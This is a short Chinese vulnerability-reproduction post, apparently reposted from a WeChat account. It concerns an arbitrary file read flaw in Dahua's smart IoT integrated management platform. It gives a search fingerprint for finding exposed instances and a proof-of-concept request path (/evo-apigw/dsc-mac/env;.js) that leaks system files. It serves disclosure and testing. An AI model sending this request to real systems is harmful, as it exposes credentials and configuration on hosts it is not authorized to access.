大华智能物联综合管理平台存在env任意文件读取漏洞 admin 109443文章 90评论 2024年7月3日23:16:44评论8 views字数 171阅读0分34秒阅读模式 1 漏洞描述 大华智能物联综合管理平台存在env任意文件读取漏洞,允许攻击者远程读取系统中的任意文件。 2 漏洞复现 首页 GET方式访问 3 网络测绘 body="*客户端会小于800*" 4 漏洞POC 地址/evo-apigw/dsc-mac/env;.js 原文始发于微信公众号(我吃饼干):【漏洞复现】大华智能物联综合管理平台存在env任意文件读取漏洞 点赞 https://cn-sec.com/archives/2914500.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论